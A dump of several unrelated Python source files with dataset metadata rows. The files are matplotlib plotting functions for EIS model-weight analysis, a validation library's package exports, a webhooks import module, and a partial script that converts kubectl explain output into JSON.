# axs[0].set_yticks(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4))
# axs[0].set_ylim(y1_min, y1_max)
axs[0].set_yticks(np.around(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4), decimals=2))
axs[0].set_ylim(y1_min-0.01, y1_max+0.01)
# axs[0].set_xlabel('distance (m)')
axs[0].set_ylabel('Average of Abs(Weights)', fontdict=x_y_title_font_setting)
# 调整上图中(x)和y轴上的字体
labels = axs[0].get_yticklabels()
[label.set_fontname('Times New Roman') for label in labels]
# plt.text添加文字 设置字体颜色 https://blog.csdn.net/m0_38139098/article/details/104739475
# axs[0].text(25, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
# axs[0].text(75, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
# axs[0].text(125, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
axs[0].text(10, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
axs[0].text(65, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
axs[0].text(120, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
axs[0].axvline(53, linestyle='--', color='red') # 红色虚线
axs[0].axvline(106, linestyle='--', color='red') # 红色虚线
# plot 高中低三个区Avg的Avg横线
axs[0].plot(np.arange(53), np.ones(53)*avg_avg_high, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(53, 106), np.ones(53)*avg_avg_mid, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(106, 160), np.ones(54)*avg_avg_low, linestyle='-.', color='green', linewidth=3)
# 设置上图中坐标轴刻度字体大小
axs[0].tick_params(labelsize=14)
axs[1].plot(x_arr, y2_arr)
y2_min, y2_max = np.min(y2_arr), np.max(y2_arr)
# 这样设置太贴近上下边界,而且y轴数值有小数点后四位(太多,两位即可)
# axs[1].set_yticks(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4))
# axs[1].set_ylim(y2_min, y2_max)
axs[1].set_yticks(np.around(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4), decimals=2))
axs[1].set_ylim(y2_min-0.01, y2_max+0.01)
axs[1].set_ylabel('Variance of Abs(Weights)', fontdict=x_y_title_font_setting)
axs[1].set_xlabel('EIS Points Order', fontdict=x_y_title_font_setting)
# axs[1].text(25, 0.9*(y2_max-y2_min)+y2_min, 'Low', size=18, family = "Times New Roman")
# axs[1].text(75, 0.9*(y2_max-y2_min)+y2_min, 'Middle', size=18, family = "Times New Roman")
# axs[1].text(125, 0.9*(y2_max-y2_min)+y2_min, 'High', size=18, family = "Times New Roman")
axs[1].axvline(53, linestyle='--', color='red') # 红色虚线
axs[1].axvline(106, linestyle='--', color='red') # 红色虚线
# plot 高中低三个区Var的Avg横线
axs[1].plot(np.arange(53), np.ones(53)*avg_var_high, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(53, 106), np.ones(53)*avg_var_mid, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(106, 160), np.ones(54)*avg_var_low, linestyle='-.', color='green', linewidth=3)
# 设置下图中坐标轴刻度字体大小
axs[1].tick_params(labelsize=14)
# 调整下图中(x)和y轴上的字体
labels = axs[1].get_xticklabels() + axs[1].get_yticklabels()
[label.set_fontname('Times New Roman') for label in labels]
plt.show()
def my_shareX_2Y_plot_4_AB_1(x_arr, y1_arr, y2_arr):
"""
Function
用于AB 结果的绘图
:param
w_type: str
'w', raw/original weight
'abs', the Abs(w)
'positive', only keep the weight with positive value
:return:
"""
# 计算高中低三个区Avg的Avg
avg_avg_high = np.mean(y1_arr[:int(y1_arr.shape[0] / 3)])
avg_avg_mid = np.mean(y1_arr[int(y1_arr.shape[0] / 3) : int(2 * y1_arr.shape[0] / 3)])
avg_avg_low = np.mean(y1_arr[int(2 * y1_arr.shape[0] / 3) : ])
# 计算高中低三个区Avg的Var
avg_var_high = np.mean(y2_arr[:int(y2_arr.shape[0] / 3)])
avg_var_mid = np.mean(y2_arr[int(y2_arr.shape[0] / 3) : int(2 * y2_arr.shape[0] / 3)])
avg_var_low = np.mean(y2_arr[int(2 * y2_arr.shape[0] / 3) : ])
# 3d surface plot的长宽比大概是4:3,此处放大3倍,12:9
fig, axs = plt.subplots(2, 1, figsize=(12, 9), sharex=True)
# 设置横纵坐标轴上的刻度字体大小
# plt.tick_params(labelsize=30)
# Remove horizontal space between axes
fig.subplots_adjust(hspace=0)
# 设置横纵坐标的[名称/标题]以及对应字体格式
# x_y_title_font_setting = {'family': 'Times New Roman',
# 'weight': 'normal',
# 'size': 18}
x_y_title_font_setting_0 = {'family': 'Times New Roman',
'weight': 'bold',
'size': 18}
# Plot each graph, and manually set the y tick values
axs[0].plot(x_arr, y1_arr)
y1_min, y1_max = np.min(y1_arr), np.max(y1_arr)
# 这样设置太贴近上下边界,而且y轴数值有小数点后四位(太多,两位即可)
# axs[0].set_yticks(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4))
# axs[0].set_ylim(y1_min, y1_max)
axs[0].set_yticks(np.around(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4), decimals=2))
axs[0].set_ylim(y1_min-0.01, y1_max+0.01)
# matplotlib 字母上加上划线
# python da
# axs[0].set_xlabel('distance (m)')
# axs[0].set_ylabel('Average of Abs(Weights)', fontdict=x_y_title_font_setting_0)
# axs[0].set_ylabel('|'+r"$\overline{w}$"+'|', fontdict=x_y_title_font_setting_0)
# 调整上图中(x)和y轴上的字体
labels = axs[0].get_yticklabels()
[label.set_fontname('Times New Roman') for label in labels]
# plt.text添加文字 设置字体颜色 https://blog.csdn.net/m0_38139098/article/details/104739475
# axs[0].text(25, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
# axs[0].text(75, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
# axs[0].text(125, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
# axs[0].text(10, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
# axs[0].text(65, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
# axs[0].text(120, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
# axs[0].text(10, 0.9*(y1_max-y1_min)+y1_min, 'High', size=18, family = "Times New Roman")
# axs[0].text(65, 0.9*(y1_max-y1_min)+y1_min, 'Middle', size=18, family = "Times New Roman")
# axs[0].text(120, 0.9*(y1_max-y1_min)+y1_min, 'Low', size=18, family = "Times New Roman")
axs[0].axvline(53, linestyle='--', color='red') # 红色虚线
axs[0].axvline(106, linestyle='--', color='red') # 红色虚线
# plot 高中低三个区Avg的Avg横线
axs[0].plot(np.arange(53), np.ones(53)*avg_avg_high, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(53, 106), np.ones(53)*avg_avg_mid, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(106, 160), np.ones(54)*avg_avg_low, linestyle='-.', color='green', linewidth=3)
# 设置上图中坐标轴刻度字体大小
axs[0].tick_params(labelsize=14)
axs[1].plot(x_arr, y2_arr)
y2_min, y2_max = np.min(y2_arr), np.max(y2_arr)
# 这样设置太贴近上下边界,而且y轴数值有小数点后四位(太多,两位即可)
# axs[1].set_yticks(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4))
# axs[1].set_ylim(y2_min, y2_max)
axs[1].set_yticks(np.around(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4), decimals=2))
axs[1].set_ylim(y2_min-0.01, y2_max+0.01)
x_y_title_font_setting_1 = {'family': 'Times New Roman',
'weight': 'normal',
'size': 18}
# axs[1].set_ylabel('Variance of Abs(Weights)', fontdict=x_y_title_font_setting_1)
# axs[1].set_xlabel('EIS Points Order', fontdict=x_y_title_font_setting_1)
# axs[1].text(25, 0.9*(y2_max-y2_min)+y2_min, 'Low', size=18, family = "Times New Roman")
# axs[1].text(75, 0.9*(y2_max-y2_min)+y2_min, 'Middle', size=18, family = "Times New Roman")
# axs[1].text(125, 0.9*(y2_max-y2_min)+y2_min, 'High', size=18, family = "Times New Roman")
axs[1].axvline(53, linestyle='--', color='red') # 红色虚线
axs[1].axvline(106, linestyle='--', color='red') # 红色虚线
# plot 高中低三个区Var的Avg横线
axs[1].plot(np.arange(53), np.ones(53)*avg_var_high, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(53, 106), np.ones(53)*avg_var_mid, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(106, 160), np.ones(54)*avg_var_low, linestyle='-.', color='green', linewidth=3)
# 设置下图中坐标轴刻度字体大小
axs[1].tick_params(labelsize=14)
# 调整下图中(x)和y轴上的字体
labels = axs[1].get_xticklabels() + axs[1].get_yticklabels()
[label.set_fontname('Times New Roman') for label in labels]
plt.show()
def my_shareX_2Y_plot_4_RF_0(x_arr, y1_arr, y2_arr, w_type):
"""
Function
用于RF Lime 结果的绘图
:param
w_type: str
'w', raw/original weight
'abs', the Abs(w)
'positive', only keep the weight with positive value
:return:
"""
# 计算高中低三个区Avg的Avg
avg_avg_high = np.mean(y1_arr[:int(y1_arr.shape[0] / 3)])
avg_avg_mid = np.mean(y1_arr[int(y1_arr.shape[0] / 3) : int(2 * y1_arr.shape[0] / 3)])
avg_avg_low = np.mean(y1_arr[int(2 * y1_arr.shape[0] / 3) : ])
# 计算高中低三个区Avg的Var
avg_var_high = np.mean(y2_arr[:int(y2_arr.shape[0] / 3)])
avg_var_mid = np.mean(y2_arr[int(y2_arr.shape[0] / 3) : int(2 * y2_arr.shape[0] / 3)])
avg_var_low = np.mean(y2_arr[int(2 * y2_arr.shape[0] / 3) : ])
# 3d surface plot的长宽比大概是4:3,此处放大3倍,12:9
fig, axs = plt.subplots(2, 1, figsize=(12, 9), sharex=True)
# 设置横纵坐标轴上的刻度字体大小
# plt.tick_params(labelsize=30)
# Remove horizontal space between axes
fig.subplots_adjust(hspace=0)
# 设置横纵坐标的[名称/标题]以及对应字体格式
x_y_title_font_setting = {'family': 'Times New Roman',
'weight': 'normal',
'size': 18}
# Plot each graph, and manually set the y tick values
axs[0].plot(x_arr, y1_arr)
y1_min, y1_max = np.min(y1_arr), np.max(y1_arr)
# 这样设置太贴近上下边界,而且y轴数值有小数点后四位(太多,两位即可)
# axs[0].set_yticks(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4))
# axs[0].set_ylim(y1_min, y1_max)
axs[0].set_yticks(np.around(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4), decimals=4))
y1_range = y1_max - y1_min
axs[0].set_ylim(y1_min - 0.1 * y1_range, y1_max + 0.1 * y1_range)
# axs[0].set_xlabel('distance (m)')
if w_type == 'abs':
axs[0].set_ylabel('Average of Abs(Weights)', fontdict=x_y_title_font_setting)
elif w_type == 'positive':
axs[0].set_ylabel('Average of Positive Weights', fontdict=x_y_title_font_setting)
elif w_type == 'w':
axs[0].set_ylabel('Average of Weights', fontdict=x_y_title_font_setting)
# 调整上图中(x)和y轴上的字体
labels = axs[0].get_yticklabels()
[label.set_fontname('Times New Roman') for label in labels]
# plt.text添加文字 设置字体颜色 https://blog.csdn.net/m0_38139098/article/details/104739475
# axs[0].text(25, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
# axs[0].text(75, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
# axs[0].text(125, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
axs[0].text(10, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
axs[0].text(65, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
axs[0].text(120, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
axs[0].axvline(53, linestyle='--', color='red') # 红色虚线
axs[0].axvline(106, linestyle='--', color='red') # 红色虚线
# plot 高中低三个区Avg的Avg横线
axs[0].plot(np.arange(53), np.ones(53)*avg_avg_high, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(53, 106), np.ones(53)*avg_avg_mid, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(106, 160), np.ones(54)*avg_avg_low, linestyle='-.', color='green', linewidth=3)
# 设置上图中坐标轴刻度字体大小
axs[0].tick_params(labelsize=14)
axs[1].plot(x_arr, y2_arr)
y2_min, y2_max = np.min(y2_arr), np.max(y2_arr)
# 这样设置太贴近上下边界,而且y轴数值有小数点后四位(太多,两位即可)
# axs[1].set_yticks(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4))
# axs[1].set_ylim(y2_min, y2_max)
axs[1].set_yticks(np.around(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4), decimals=6))
y2_range = y2_max - y2_min
axs[1].set_ylim(y2_min - 0.1 * y2_range, y2_max + 0.1 * y2_range)
if w_type == 'abs':
axs[1].set_ylabel('Variance of Abs(Weights)', fontdict=x_y_title_font_setting)
elif w_type == 'positive':
axs[1].set_ylabel('Variance of Positive Weights', fontdict=x_y_title_font_setting)
elif w_type == 'w':
axs[1].set_ylabel('Variance of Weights', fontdict=x_y_title_font_setting)
axs[1].set_xlabel('EIS Points Order', fontdict=x_y_title_font_setting)
# axs[1].text(25, 0.9*(y2_max-y2_min)+y2_min, 'Low', size=18, family = "Times New Roman")
# axs[1].text(75, 0.9*(y2_max-y2_min)+y2_min, 'Middle', size=18, family = "Times New Roman")
# axs[1].text(125, 0.9*(y2_max-y2_min)+y2_min, 'High', size=18, family = "Times New Roman")
axs[1].axvline(53, linestyle='--', color='red') # 红色虚线
axs[1].axvline(106, linestyle='--', color='red') # 红色虚线
# plot 高中低三个区Var的Avg横线
axs[1].plot(np.arange(53), np.ones(53)*avg_var_high, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(53, 106), np.ones(53)*avg_var_mid, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(106, 160), np.ones(54)*avg_var_low, linestyle='-.', color='green', linewidth=3)
# 设置下图中坐标轴刻度字体大小
axs[1].tick_params(labelsize=14)
# 调整下图中(x)和y轴上的字体
labels = axs[1].get_xticklabels() + axs[1].get_yticklabels()
[label.set_fontname('Times New Roman') for label in labels]
plt.show()
def my_shareX_2Y_plot_4_RF_1(x_arr, y1_arr, y2_arr, w_type):
"""
Function
用于RF Lime 结果的绘图
:param
w_type: str
'w', raw/original weight
'abs', the Abs(w)
'positive', only keep the weight with positive value
:return:
"""
# 计算高中低三个区Avg的Avg
avg_avg_high = np.mean(y1_arr[:int(y1_arr.shape[0] / 3)])
avg_avg_mid = np.mean(y1_arr[int(y1_arr.shape[0] / 3) : int(2 * y1_arr.shape[0] / 3)])
avg_avg_low = np.mean(y1_arr[int(2 * y1_arr.shape[0] / 3) : ])
# 计算高中低三个区Avg的Var
avg_var_high = np.mean(y2_arr[:int(y2_arr.shape[0] / 3)])
avg_var_mid = np.mean(y2_arr[int(y2_arr.shape[0] / 3) : int(2 * y2_arr.shape[0] / 3)])
avg_var_low = np.mean(y2_arr[int(2 * y2_arr.shape[0] / 3) : ])
# 3d surface plot的长宽比大概是4:3,此处放大3倍,12:9
fig, axs = plt.subplots(2, 1, figsize=(12, 9), sharex=True)
# 设置横纵坐标轴上的刻度字体大小
# plt.tick_params(labelsize=30)
# Remove horizontal space between axes
fig.subplots_adjust(hspace=0)
# 设置横纵坐标的[名称/标题]以及对应字体格式
x_y_title_font_setting = {'family': 'Times New Roman',
'weight': 'normal',
'size': 18}
# Plot each graph, and manually set the y tick values
axs[0].plot(x_arr, y1_arr)
y1_min, y1_max = np.min(y1_arr), np.max(y1_arr)
# 这样设置太贴近上下边界,而且y轴数值有小数点后四位(太多,两位即可)
# axs[0].set_yticks(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4))
# axs[0].set_ylim(y1_min, y1_max)
axs[0].set_yticks(np.around(np.arange(y1_min, y1_max, (y1_max - y1_min) / 4), decimals=4))
y1_range = y1_max - y1_min
axs[0].set_ylim(y1_min - 0.1 * y1_range, y1_max + 0.1 * y1_range)
# axs[0].set_xlabel('distance (m)')
# if w_type == 'abs':
# axs[0].set_ylabel('Average of Abs(Weights)', fontdict=x_y_title_font_setting)
# elif w_type == 'positive':
# axs[0].set_ylabel('Average of Positive Weights', fontdict=x_y_title_font_setting)
# elif w_type == 'w':
# axs[0].set_ylabel('Average of Weights', fontdict=x_y_title_font_setting)
# 调整上图中(x)和y轴上的字体
labels = axs[0].get_yticklabels()
[label.set_fontname('Times New Roman') for label in labels]
# plt.text添加文字 设置字体颜色 https://blog.csdn.net/m0_38139098/article/details/104739475
# axs[0].text(25, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
# axs[0].text(75, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
# axs[0].text(125, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
# axs[0].text(10, 0.9*(y1_max-y1_min)+y1_min, 'High Frequency', size=18, family = "Times New Roman")
# axs[0].text(65, 0.9*(y1_max-y1_min)+y1_min, 'Middle Frequency', size=18, family = "Times New Roman")
# axs[0].text(120, 0.9*(y1_max-y1_min)+y1_min, 'Low Frequency', size=18, family = "Times New Roman")
axs[0].axvline(53, linestyle='--', color='red') # 红色虚线
axs[0].axvline(106, linestyle='--', color='red') # 红色虚线
# plot 高中低三个区Avg的Avg横线
axs[0].plot(np.arange(53), np.ones(53)*avg_avg_high, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(53, 106), np.ones(53)*avg_avg_mid, linestyle='-.', color='green', linewidth=3)
axs[0].plot(np.arange(106, 160), np.ones(54)*avg_avg_low, linestyle='-.', color='green', linewidth=3)
# 设置上图中坐标轴刻度字体大小
axs[0].tick_params(labelsize=14)
axs[1].plot(x_arr, y2_arr)
y2_min, y2_max = np.min(y2_arr), np.max(y2_arr)
# 这样设置太贴近上下边界,而且y轴数值有小数点后四位(太多,两位即可)
# axs[1].set_yticks(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4))
# axs[1].set_ylim(y2_min, y2_max)
axs[1].set_yticks(np.around(np.arange(y2_min, y2_max, (y2_max - y2_min) / 4), decimals=6))
y2_range = y2_max - y2_min
axs[1].set_ylim(y2_min - 0.1 * y2_range, y2_max + 0.1 * y2_range)
# if w_type == 'abs':
# axs[1].set_ylabel('Variance of Abs(Weights)', fontdict=x_y_title_font_setting)
# elif w_type == 'positive':
# axs[1].set_ylabel('Variance of Positive Weights', fontdict=x_y_title_font_setting)
# elif w_type == 'w':
# axs[1].set_ylabel('Variance of Weights', fontdict=x_y_title_font_setting)
# axs[1].set_xlabel('EIS Points Order', fontdict=x_y_title_font_setting)
# axs[1].text(25, 0.9*(y2_max-y2_min)+y2_min, 'Low', size=18, family = "Times New Roman")
# axs[1].text(75, 0.9*(y2_max-y2_min)+y2_min, 'Middle', size=18, family = "Times New Roman")
# axs[1].text(125, 0.9*(y2_max-y2_min)+y2_min, 'High', size=18, family = "Times New Roman")
axs[1].axvline(53, linestyle='--', color='red') # 红色虚线
axs[1].axvline(106, linestyle='--', color='red') # 红色虚线
# plot 高中低三个区Var的Avg横线
axs[1].plot(np.arange(53), np.ones(53)*avg_var_high, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(53, 106), np.ones(53)*avg_var_mid, linestyle='-.', color='green', linewidth=3)
axs[1].plot(np.arange(106, 160), np.ones(54)*avg_var_low, linestyle='-.', color='green', linewidth=3)
# 设置下图中坐标轴刻度字体大小
axs[1].tick_params(labelsize=14)
# 调整下图中(x)和y轴上的字体
labels = axs[1].get_xticklabels() + axs[1].get_yticklabels()
[label.set_fontname('Times New Roman') for label in labels]
plt.show()
def test_0():
# 希腊字母
plt.plot([0, 1, 2], [0, 1, 2], label=r"$\alpha$")
# 给字母上 加 横线
plt.plot([0, 1, 2], [0, 1, 2], label=r"$\overline{a}$") # This is the offending line
plt.plot([0, 1, 2], [0, 1, 2], label=r"$\overline{$\overline{a}$}$") # This is the offending line
# 加粗字体
# plt.plot([0, 1, 2], [0, 1, 2], label=r"$\alpha$", fontdict={'weight': 'bold'})
plt.legend(loc='best')
plt.show()
# test_0()
| 43.619522
| 137
| 0.633831
| 3,681
| 21,897
| 3.576745
| 0.059223
| 0.027647
| 0.052332
| 0.06494
| 0.969315
| 0.965821
| 0.961036
| 0.946757
| 0.943947
| 0.943795
| 0
| 0.07659
| 0.186692
| 21,897
| 502
| 138
| 43.619522
| 0.662699
| 0.37649
| 0
| 0.836634
| 0
| 0
| 0.078069
| 0.002062
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029703
| false
| 0
| 0.009901
| 0
| 0.039604
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7273000883820ef48d0809af01c4fa0b32360a5e
| 595
|
py
|
Python
|
gateguard/__init__.py
|
pyvim/gateguard
|
78ffd55139a0290a9a3c521290c01fe8bb6a15bd
|
[
"MIT"
] | null | null | null |
gateguard/__init__.py
|
pyvim/gateguard
|
78ffd55139a0290a9a3c521290c01fe8bb6a15bd
|
[
"MIT"
] | null | null | null |
gateguard/__init__.py
|
pyvim/gateguard
|
78ffd55139a0290a9a3c521290c01fe8bb6a15bd
|
[
"MIT"
] | null | null | null |
# coding=utf-8
from .fields import (
BooleanField,
StringField,
IntegerField,
FloatField,
ChoiceField,
ArrayField,
MultipleChoiceField,
URLField,
RegexMatchField,
HostField,
SlugField,
MapField
)
from .schema import Schema
from .exceptions import ValidationError
__all__ = (
'BooleanField',
'StringField',
'IntegerField',
'FloatField',
'ChoiceField',
'ArrayField',
'MultipleChoiceField',
'URLField',
'RegexMatchField',
'HostField',
'SlugField',
'MapField',
'Schema',
'ValidationError',
)
| 16.081081
| 39
| 0.636975
| 41
| 595
| 9.146341
| 0.536585
| 0.122667
| 0.186667
| 0.24
| 0.714667
| 0.714667
| 0.714667
| 0.714667
| 0.714667
| 0.714667
| 0
| 0.002257
| 0.255462
| 595
| 36
| 40
| 16.527778
| 0.844244
| 0.020168
| 0
| 0
| 0
| 0
| 0.266781
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.09375
| 0
| 0.09375
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
72b3b25838265f15da07653e7ac94df170fdaeb3
| 118
|
py
|
Python
|
src/webhooks/backends/__init__.py
|
Welltory/zoom2youtube
|
91fc12a0f83012fa5664caf3bffa1246e272b205
|
[
"MIT"
] | 64
|
2017-08-17T12:28:37.000Z
|
2022-03-28T11:43:29.000Z
|
src/webhooks/backends/__init__.py
|
Welltory/zoom2youtube
|
91fc12a0f83012fa5664caf3bffa1246e272b205
|
[
"MIT"
] | 8
|
2018-07-25T18:00:06.000Z
|
2021-05-27T04:33:32.000Z
|
src/webhooks/backends/__init__.py
|
Welltory/zoom2youtube
|
91fc12a0f83012fa5664caf3bffa1246e272b205
|
[
"MIT"
] | 19
|
2019-01-25T23:11:28.000Z
|
2022-01-15T09:52:13.000Z
|
from webhooks.backends.slack import *
from webhooks.backends.zapier import *
from webhooks.backends.welltory import *
| 29.5
| 40
| 0.822034
| 15
| 118
| 6.466667
| 0.466667
| 0.371134
| 0.618557
| 0.536082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101695
| 118
| 3
| 41
| 39.333333
| 0.915094
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
72bd9b452f19426f5db879155320aca5c7a16812
| 8,709
|
py
|
Python
|
python-scripts/parse_data_from_kubectl_command/main.py
|
MohanSai1997/kubernaml
|
e839d01f5792f2a860ef3ade79f529000a728a66
|
[
"MIT"
] | 1
|
2020-03-29T11:04:18.000Z
|
2020-03-29T11:04:18.000Z
|
python-scripts/parse_data_from_kubectl_command/main.py
|
MohanSai1997/kuber-yaml-gen
|
e839d01f5792f2a860ef3ade79f529000a728a66
|
[
"MIT"
] | 2
|
2022-02-19T06:46:02.000Z
|
2022-02-27T10:39:01.000Z
|
python-scripts/parse_data_from_kubectl_command/main.py
|
MohanSai1997/kuber-yaml-gen
|
e839d01f5792f2a860ef3ade79f529000a728a66
|
[
"MIT"
] | 2
|
2021-11-19T15:36:20.000Z
|
2022-01-24T07:45:27.000Z
|
# Output the kubectl explain deployment --recursive
fr = open("data (1).txt", "r")
# fr = open("data.txt", "r")
fw = open("json_data.json", "a")
parse_arr = fr.readlines()[12:] #get the elements from FIELDS:\n elements
fw.write("{ \n")
current_location_path = {}
past_space_count = 3
object_state_arr = []
def function_write_data(arr_element, present_space_count):
"""
It will write the } and }] data to the file
"""
print("ARRAY", arr_element[::-1])
for i in arr_element[::-1]:
if i == 0:
fw.write(" "*present_space_count + "}, \n")
else:
fw.write( " "*present_space_count + "}], \n")
def remove_arr_elements(arr_element, count):
"""
Remove the elements from object_state_arr
"""
for _ in range(count):
arr_element.pop()
return arr_element
for i in parse_arr:
element_name = i.split('\t')[0]
property_name = element_name.strip() # parsing the property name
present_space_count = element_name.count(" ")
if "<map[string]string>" in i:
if present_space_count < past_space_count:
if object_state_arr[-1] == 0:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [{}],\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
elif object_state_arr[-1] == 1:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [{}],\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
else:
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [{}],\n")
if "<string>" in i:
if present_space_count < past_space_count :
if object_state_arr[-1] == 0:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": \" \" ,\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
elif object_state_arr[-1] == 1:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": \" \" ,\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
else:
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": \" \" ,\n")
if "<[]string>" in i:
if present_space_count < past_space_count :
if object_state_arr[-1] == 0:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [\"\"],\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
elif object_state_arr[-1] == 1:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [\"\"],\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
else:
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": [\"\"],\n")
if "<integer>" in i:
if present_space_count < past_space_count :
if object_state_arr[-1] == 0:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": 0 ,\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
elif object_state_arr[-1] == 1:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": 0 ,\n")
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
else:
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": 0 ,\n")
if "<boolean>" in i:
if present_space_count < past_space_count :
if object_state_arr[-1] == 0:
function_write_data(object_state_arr[len(object_state_arr) - int(abs((past_space_count - present_space_count)/3)) : ], present_space_count)
fw.write( " "*present_space_count + "\"" + property_name + "\"" + ": \" \", \n" )
object_state_arr = remove_arr_elements(object_state_arr, int(abs((past_space_count - present_space_count)/3)))
